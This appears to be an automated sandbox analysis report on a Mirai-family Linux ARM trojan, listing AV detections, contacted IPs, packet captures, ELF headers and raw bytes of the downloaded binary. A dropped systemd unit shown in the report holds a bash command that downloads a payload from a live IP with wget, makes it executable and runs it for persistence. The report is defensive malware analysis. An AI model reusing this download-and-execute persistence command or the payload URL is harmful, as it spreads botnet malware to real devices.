behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588812 Sample: 3.elf Startdate: 11/01/2025 Architecture: LINUX Score: 56 37 109.202.202.202, 80 INIT7CH Switzerland 2->37 39 1.1.1.1, 37545, 43247, 53 CLOUDFLARENETUS Australia 2->39 41 3 other IPs or domains 2->41 45 Multi AV Scanner detection for submitted file 2->45 8 systemd bash 2->8         started        10 3.elf 2->10         started        13 xfce4-panel wrapper-2.0 2->13         started        15 6 other processes 2->15 signatures3 process4 signatures5 17 bash rm 8->17         started        20 bash wget 8->20         started        23 bash 3 8->23         started        29 2 other processes 8->29 47 Sample tries to kill multiple processes (SIGKILL) 10->47 25 3.elf sh 10->25         started        27 3.elf sh 10->27         started        process6 file7 43 Sample deletes itself 17->43 35 /tmp/3, ELF 20->35 dropped 31 sh systemctl 25->31         started        33 sh systemctl 27->33         started        signatures8 process9

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
3.elf27%VirustotalBrowse
3.elf32%ReversingLabsLinux.Trojan.Mirai
SourceDetectionScannerLabelLink
/tmp/332%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/3100%Avira URL Cloudmalware
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://103.136.41.100/3false
  • Avira URL Cloud: malware
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://%d.%d.%d.%d/%s3.44.drfalse
    high
    http://1/wget.sh3.elf, 6209.1.00007fbbd4036000.00007fbbd403a000.rw-.sdmp, bash, 6261.1.00007f129c036000.00007f129c03a000.rw-.sdmp, 3, 6261.1.00007f129c036000.00007f129c03a000.rw-.sdmpfalse
      high
      http://schemas.xmlsoap.org/soap/encoding/3.44.drfalse
        high
        http://9/curl.sh3.elf, 6209.1.00007fbbd4036000.00007fbbd403a000.rw-.sdmp, bash, 6261.1.00007f129c036000.00007f129c03a000.rw-.sdmp, 3, 6261.1.00007f129c036000.00007f129c03a000.rw-.sdmpfalse
          high
          http://%d.%d.%d.%d/2;3.elf, 3.44.drfalse
            high
            http://schemas.xmlsoap.org/soap/envelope/3.44.drfalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              1.1.1.1
              unknownAustralia
              13335CLOUDFLARENETUSfalse
              103.136.41.100
              unknownIndia
              139884AGPL-AS-APApeironGlobalPvtLtdINfalse
              109.202.202.202
              unknownSwitzerland
              13030INIT7CHfalse
              91.189.91.43
              unknownUnited Kingdom
              41231CANONICAL-ASGBfalse
              91.189.91.42
              unknownUnited Kingdom
              41231CANONICAL-ASGBfalse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              1.1.1.1watchdog.elfGet hashmaliciousXmrigBrowse
              • 1.1.1.1:8080/
              6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
              • 1.1.1.1/ctrl/playback.php
              PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
              • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
              AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
              • 1.1.1.1/
              INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
              • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
              Go.exeGet hashmaliciousUnknownBrowse
              • 1.1.1.1/
              103.136.41.1004.elfGet hashmaliciousUnknownBrowse
              • 103.136.41.100/4
              dlr.mips.elfGet hashmaliciousUnknownBrowse
              • 127.0.0.1/12
              dlr.arm7.elfGet hashmaliciousUnknownBrowse
              • 127.0.0.1/6
              dlr.mpsl.elfGet hashmaliciousUnknownBrowse
              • 127.0.0.1/2
              109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
              • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUSprgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
              • 104.21.112.1
              wSoShbuXnJ.exeGet hashmaliciousFormBookBrowse
              • 104.21.86.111
              1507513743282749438.jsGet hashmaliciousStrela DownloaderBrowse
              • 162.159.61.3
              rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
              • 104.21.48.1
              C6Abn5cBei.exeGet hashmaliciousFormBookBrowse
              • 172.67.145.234
              wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
              • 104.21.80.1
              prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
              • 104.21.48.1
              ZcshRk2lgh.exeGet hashmaliciousFormBookBrowse
              • 104.21.15.100
              ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
              • 104.21.48.1
              leUmNO9XPu.exeGet hashmaliciousHawkEye, MailPassViewBrowse
              • 104.19.223.79
              CANONICAL-ASGB2.elfGet hashmaliciousUnknownBrowse
              • 91.189.91.42
              arm6.elfGet hashmaliciousUnknownBrowse
              • 91.189.91.42
              mpsl.elfGet hashmaliciousUnknownBrowse
              • 91.189.91.42
              mips.elfGet hashmaliciousUnknownBrowse
              • 185.125.190.26
              spc.elfGet hashmaliciousUnknownBrowse
              • 91.189.91.42
              sse.elfGet hashmaliciousGafgytBrowse
              • 91.189.91.42
              ssp.elfGet hashmaliciousGafgytBrowse
              • 91.189.91.42
              2.elfGet hashmaliciousUnknownBrowse
              • 91.189.91.42
              12.elfGet hashmaliciousUnknownBrowse
              • 91.189.91.42
              Space.arm.elfGet hashmaliciousMiraiBrowse
              • 91.189.91.42
              AGPL-AS-APApeironGlobalPvtLtdINdlr.mips.elfGet hashmaliciousUnknownBrowse
              • 103.136.41.100
              dlr.arm7.elfGet hashmaliciousUnknownBrowse
              • 103.136.41.100
              dlr.mpsl.elfGet hashmaliciousUnknownBrowse
              • 103.136.41.100
              2461ACFA271F7D477CA53ABE428D6ADDE1F285E115F18.exeGet hashmaliciousFFDroiderBrowse
              • 103.136.41.162
              wYWdigdSjn.exeGet hashmaliciousNeshtaBrowse
              • 103.136.42.153
              38b2c7a1af454d382927f81543d86055886bc02863457.exeGet hashmaliciousUnknownBrowse
              • 103.136.42.153
              l39HA25qjw.exeGet hashmaliciousManusCrypt, SocelarsBrowse
              • 103.136.42.153
              SecuriteInfo.com.Win32.Malware-gen.30674.exeGet hashmaliciousUnknownBrowse
              • 103.136.42.153
              file.exeGet hashmaliciousFFDroiderBrowse
              • 103.136.42.153
              qkOFMWXZmrGet hashmaliciousUnknownBrowse
              • 103.136.41.100
              INIT7CH2.elfGet hashmaliciousUnknownBrowse
              • 109.202.202.202
              arm6.elfGet hashmaliciousUnknownBrowse
              • 109.202.202.202
              mpsl.elfGet hashmaliciousUnknownBrowse
              • 109.202.202.202
              spc.elfGet hashmaliciousUnknownBrowse
              • 109.202.202.202
              sse.elfGet hashmaliciousGafgytBrowse
              • 109.202.202.202
              ssp.elfGet hashmaliciousGafgytBrowse
              • 109.202.202.202
              2.elfGet hashmaliciousUnknownBrowse
              • 109.202.202.202
              12.elfGet hashmaliciousUnknownBrowse
              • 109.202.202.202
              Space.arm.elfGet hashmaliciousMiraiBrowse
              • 109.202.202.202
              arm.elfGet hashmaliciousUnknownBrowse
              • 109.202.202.202
              No context
              No context
              Process:/tmp/3.elf
              File Type:ASCII text
              Category:dropped
              Size (bytes):289
              Entropy (8bit):5.179085200165592
              Encrypted:false
              SSDEEP:6:z8KbX9RZAMGCk4vEuIACLm+fOA7SF5CLnEZKCEsCBLQmWA4Rv:zb9RZADJiIE+mJqBLLHWrv
              MD5:7440622BA3FEF47B005C0B4C8B0D9443
              SHA1:54B242CDB78AC9AA4AA94CC1A14AB19A6D83F9E6
              SHA-256:2BC9EBC8470F926BCF99E3D6DA7F5D0F7AECB5365523DAD12BA50E0BFB577906
              SHA-512:48ACFCD0C7FA0073E027357EFA492321C8E89F19BF15B44146C395B3B0F753E54D17B88EED0897BA980654B5D4CA60B41B32320D38CE4F45ED9AB2BC20560C8F
              Malicious:false
              Reputation:low
              Preview:[Unit].Description=hi.After=network.target..[Service].RemainAfterExit=true.TimeoutSec=30s.Restart=no.ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/3; wget http://103.136.41.100/3 -O /tmp/3; chmod 777 /tmp/3; /tmp/3 .p1 > /dev/null 2>&1;".Type=forking..[Install].WantedBy=multi-user.target.
              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
              File Type:ASCII text
              Category:dropped
              Size (bytes):76
              Entropy (8bit):3.7627880354948586
              Encrypted:false
              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
              MD5:D86A1F5765F37989EB0EC3837AD13ECC
              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
              Process:/usr/bin/wget
              File Type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
              Category:dropped
              Size (bytes):91804
              Entropy (8bit):6.096049172768235
              Encrypted:false
              SSDEEP:1536:D4sQfTMJMmMoy5YRS/P6Vu02WBQ3N1AaZGj65FV/VpI4ynWuSAyUX0v7p6dU:AfgJMmtyK0/P6I0E91AcWiFV/VpI/qA3
              MD5:366778B08315367D82A6EA8481DDCDAA
              SHA1:897E2E7197BD9D80754F7CAF8FBB962E476A5C17
              SHA-256:35137294137DA3A15894AA17A335631372ED8968DFC892A8F13E2F8469389AD4
              SHA-512:DFD2266D3DA2FE6206A1F1BDBAE9DC2D3A5BA1392FD490401869BC9C6628AE9047DA38140482F8A826A7B8C67FD3AF970BFF214CF83D5E2E514501A613238453
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 32%
              Reputation:low
              Preview:.ELF...a..........(.........4....d......4. ...(......................]...]...............`...`...`......L...........Q.td..................................-...L."...P.........0@-.\P...0....S.0...P@...0... ....R......0...0.........0... ....R..... 0....S............0...0..0...d.. `.......`....-....<0....S...-.4...4.........,....0....S.... 0....S..................`...d...`........-................ ... -...-.......-......0..D..J@.....l........@-.B...0....S.C............ ...6...0....S.F............ ...6.. 0....S.I... ........ ...6..00....S.L...0........ ...6..@0....S.O...@........ ...6..P0....S.R...P........ ...6..`0....S.U...`........ ...6..p0....S.X...p........ ..6..0....S.[............ ..6..0....S.^............ ...@..6...........8........... ..6...0....S.............8........... ..6.. 0....S........$....8.. ........ ..6..00....S........4....8..0........ ..6..@0....S........D....8..@........ ..~6..P0....S........T....8..P........ ..t6..`0....S........d...
              File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
              Entropy (8bit):6.096049172768235
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:3.elf
              File size:91'804 bytes
              MD5:366778b08315367d82a6ea8481ddcdaa
              SHA1:897e2e7197bd9d80754f7caf8fbb962e476a5c17
              SHA256:35137294137da3a15894aa17a335631372ed8968dfc892a8f13e2f8469389ad4
              SHA512:dfd2266d3da2fe6206a1f1bdbae9dc2d3a5ba1392fd490401869bc9c6628ae9047da38140482f8a826a7b8c67fd3af970bff214cf83d5e2e514501a613238453
              SSDEEP:1536:D4sQfTMJMmMoy5YRS/P6Vu02WBQ3N1AaZGj65FV/VpI4ynWuSAyUX0v7p6dU:AfgJMmtyK0/P6I0E91AcWiFV/VpI/qA3
              TLSH:F9930946F880A623C2C256B7BB1F019D37155BA9F1DB33439C381B61B79B91F0E27A46
              File Content Preview:.ELF...a..........(.........4....d......4. ...(......................]...]...............`...`...`......L...........Q.td..................................-...L."....P..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

              ELF header

              Class:ELF32
              Data:2's complement, little endian
              Version:1 (current)
              Machine:ARM
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:ARM - ABI
              ABI Version:0
              Entry Point Address:0x8190
              Flags:0x202
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:3
              Section Header Offset:91364
              Section Header Size:40
              Number of Section Headers:11
              Header String Table Index:10
              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x80940x940x180x00x6AX004
              .textPROGBITS0x80b00xb00x142e80x00x6AX0016
              .finiPROGBITS0x1c3980x143980x140x00x6AX004
              .rodataPROGBITS0x1c3ac0x143ac0x196c0x00x2A004
              .eh_framePROGBITS0x260000x160000x40x00x3WA004
              .ctorsPROGBITS0x260040x160040x80x00x3WA004
              .dtorsPROGBITS0x2600c0x1600c0x80x00x3WA004
              .dataPROGBITS0x260180x160180x4840x00x3WA004
              .bssNOBITS0x2649c0x1649c0x29b00x00x3WA004
              .shstrtabSTRTAB0x00x1649c0x480x00x0001
              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x80000x80000x15d180x15d186.11920x5R E0x8000.init .text .fini .rodata
              LOAD0x160000x260000x260000x49c0x2e4c6.01990x6RW 0x8000.eh_frame .ctors .dtors .data .bss
              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
              TimestampSource PortDest PortSource IPDest IP
              Jan 11, 2025 05:51:08.746813059 CET43928443192.168.2.2391.189.91.42
              Jan 11, 2025 05:51:12.979718924 CET3754553192.168.2.231.1.1.1
              Jan 11, 2025 05:51:12.984652996 CET53375451.1.1.1192.168.2.23
              Jan 11, 2025 05:51:12.984770060 CET3754553192.168.2.231.1.1.1
              Jan 11, 2025 05:51:12.984810114 CET3754553192.168.2.231.1.1.1
              Jan 11, 2025 05:51:12.989763975 CET53375451.1.1.1192.168.2.23
              Jan 11, 2025 05:51:12.989806890 CET3754553192.168.2.231.1.1.1
              Jan 11, 2025 05:51:14.122118950 CET42836443192.168.2.2391.189.91.43
              Jan 11, 2025 05:51:15.657988071 CET4251680192.168.2.23109.202.202.202
              Jan 11, 2025 05:51:23.548101902 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:23.552978039 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:23.553047895 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:23.554459095 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:23.559273958 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.169682026 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.169702053 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.169713974 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.169724941 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.169735909 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.169747114 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.169758081 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.169770956 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.169776917 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.169783115 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.169904947 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.169904947 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.169904947 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.169904947 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.169951916 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.169951916 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.169953108 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.169953108 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.169953108 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.169953108 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.174673080 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.174695015 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.174714088 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.174732924 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.254611969 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.254681110 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.254694939 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.254713058 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.254865885 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.254865885 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.254865885 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.254865885 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.254970074 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.254985094 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.255090952 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.255105019 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.255552053 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.256362915 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.256484032 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.256498098 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.256511927 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.256526947 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.258464098 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.258476019 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.258487940 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.258500099 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.258511066 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.259618044 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.260195017 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.260210991 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.260222912 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.266019106 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.298994064 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.299032927 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.299101114 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.299119949 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.299129963 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.299593925 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.341746092 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.341767073 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.341778994 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.341792107 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.341814041 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.341826916 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.341841936 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.341856003 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.342178106 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.342255116 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.342272043 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.342322111 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.342485905 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.342812061 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.342874050 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.342890024 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.343029022 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.343043089 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.343729973 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.343743086 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.343755960 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.343861103 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.343874931 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.344573975 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.344585896 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.344599009 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.344702005 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.344713926 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.345813036 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.345824957 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.345839977 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.346139908 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.346152067 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.347660065 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.347671986 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.347685099 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.347697973 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.347711086 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.348562956 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.348575115 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.348728895 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.348742008 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.348753929 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.352853060 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.385941982 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.386004925 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.420605898 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:24.425767899 CET8033748103.136.41.100192.168.2.23
              Jan 11, 2025 05:51:24.425823927 CET3374880192.168.2.23103.136.41.100
              Jan 11, 2025 05:51:27.903804064 CET4324753192.168.2.231.1.1.1
              Jan 11, 2025 05:51:27.908693075 CET53432471.1.1.1192.168.2.23
              Jan 11, 2025 05:51:27.908806086 CET4324753192.168.2.231.1.1.1
              Jan 11, 2025 05:51:27.908853054 CET4324753192.168.2.231.1.1.1
              Jan 11, 2025 05:51:27.913784981 CET53432471.1.1.1192.168.2.23
              Jan 11, 2025 05:51:27.913850069 CET4324753192.168.2.231.1.1.1
              Jan 11, 2025 05:51:29.224215984 CET43928443192.168.2.2391.189.91.42
              Jan 11, 2025 05:51:41.510575056 CET42836443192.168.2.2391.189.91.43
              Jan 11, 2025 05:51:45.606139898 CET4251680192.168.2.23109.202.202.202
              Jan 11, 2025 05:52:10.178937912 CET43928443192.168.2.2391.189.91.42
              • 103.136.41.100
              Session IDSource IPSource PortDestination IPDestination Port
              0192.168.2.2333748103.136.41.10080
              TimestampBytes transferredDirectionData
              Jan 11, 2025 05:51:23.554459095 CET154OUTGET /3 HTTP/1.1
              User-Agent: Wget/1.20.3 (linux-gnu)
              Accept: */*
              Accept-Encoding: identity
              Host: 103.136.41.100
              Connection: Keep-Alive
              Jan 11, 2025 05:51:24.169682026 CET711INHTTP/1.1 200 OK
              Accept-Ranges: bytes
              Content-Length: 91804
              Content-Type: application/octet-stream
              Last-Modified: Sat, 11 Jan 2025 03:30:45 GMT
              Date: Sat, 11 Jan 2025 04:51:24 GMT
              Data Raw: 7f 45 4c 46 01 01 01 61 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 90 81 00 00 34 00 00 00 e4 64 01 00 02 02 00 00 34 00 20 00 03 00 28 00 0b 00 0a 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 18 5d 01 00 18 5d 01 00 05 00 00 00 00 80 00 00 01 00 00 00 00 60 01 00 00 60 02 00 00 60 02 00 9c 04 00 00 4c 2e 00 00 06 00 00 00 00 80 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 22 00 00 eb ac 50 00 eb f0 af 1b e9 00 00 00 00 30 40 2d e9 5c 50 9f e5 00 30 d5 e5 00 00 53 e3 30 80 bd 18 50 40 9f e5 00 30 94 e5 00 20 93 e5 00 00 52 e3 07 00 00 0a 04 30 83 e2 00 30 84 e5 0f e0 a0 e1 02 f0 a0 e1 00 30 94 e5 00 20 93 e5 00 00 52 e3 f7 ff ff 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 03 f0 a0 11 01 30 a0 e3 00 30 c5 e5 30 80 bd e8 9c 64 02 00 20 60 02 00 00 00 00 00 00 60 02 00 04 e0 2d e5 04 f0 9d e4 3c 30 9f e5 00 00 53 e3 04 e0 2d e5 34 00 9f 15 34 10 9f 15 0f e0 a0 11 03 f0 a0 11 2c 00 9f e5 00 30 [TRUNCATED]
              Data Ascii: ELFa(4d4 (]]```L.Qtd-L"P0@-\P0S0P@0 R000 R 0S000d ``-<0S-44,0S 0S`d`- ---0DJ@l@-B0SC 60SF
              Jan 11, 2025 05:51:24.169702053 CET1236INData Raw: 00 10 a0 e3 10 20 a0 e3 e6 36 00 eb 20 30 94 e5 00 00 53 e3 49 00 00 1a 20 00 84 e2 00 10 a0 e3 10 20 a0 e3 df 36 00 eb 30 30 94 e5 00 00 53 e3 4c 00 00 1a 30 00 84 e2 00 10 a0 e3 10 20 a0 e3 d8 36 00 eb 40 30 94 e5 00 00 53 e3 4f 00 00 1a 40 00
              Data Ascii: 6 0SI 600SL0 6@0SO@ 6P0SRP 6`0SU` 6p0SXp 60S[ 60S^ @6
              Jan 11, 2025 05:51:24.169713974 CET1236INData Raw: a4 37 00 eb 09 10 a0 e3 03 38 00 eb 04 00 a0 e1 f5 40 00 eb 08 00 a0 e1 f3 40 00 eb 6c 30 9f e5 00 10 d3 e5 00 00 51 e3 0e 00 00 0a 60 30 9f e5 00 20 93 e5 00 c0 92 e5 04 30 dc e5 07 00 53 e1 08 00 a0 11 04 00 00 1a 08 00 00 ea 00 c1 92 e7 04 30
              Data Ascii: 78@@l0Q`0 0S0SP@ $0ddO-Q M !< 4,4\0\0X
              Jan 11, 2025 05:51:24.169724941 CET1236INData Raw: 08 10 a0 e3 08 30 83 e0 08 00 a0 e1 00 30 c4 e5 00 20 86 e5 94 3b 00 eb 00 10 d4 e5 6c 22 9f e5 00 50 a0 e1 03 30 a0 e3 08 10 81 e0 00 00 96 e5 00 20 85 e5 04 30 c5 e5 01 11 a0 e1 cd 3b 00 eb 00 30 d4 e5 00 20 a0 e1 03 51 80 e7 08 10 a0 e3 08 30
              Data Ascii: 00 ;l"P0 0;0 Q00 ;$"P0 0;0 Q00 n;!P0 0;0 Q00
              Jan 11, 2025 05:51:24.169735909 CET1236INData Raw: 60 00 8d e5 20 30 8d e5 24 80 8d e5 28 70 8d e5 2c 60 8d e5 18 c0 8d e5 10 e0 8d e5 0c 10 8d e5 08 20 8d e5 86 00 00 ea 4c c0 9d e5 06 60 a0 e3 08 c0 c8 e5 09 60 c8 e5 d0 20 9d e5 58 e0 9d e5 82 32 a0 e1 0c e0 88 e5 82 31 43 e0 09 30 83 e0 10 20
              Data Ascii: ` 0$(p,` L`` X21C0 ` 0 020 0 " 0 @010 $ ! 0(000P,PPPH@D@
              Jan 11, 2025 05:51:24.169747114 CET956INData Raw: 14 00 c7 e5 01 30 c8 e5 96 ff ff ea 0b 00 a0 e1 ca 34 00 eb d4 d0 8d e2 f0 8f bd e8 40 86 02 00 ec c3 01 00 ac c3 01 00 c8 c3 01 00 f0 4f 2d e9 ff 90 00 e2 58 d0 4d e2 01 b0 a0 e1 09 00 a0 e1 04 10 a0 e3 03 50 a0 e1 ff 40 02 e2 22 39 00 eb 01 38
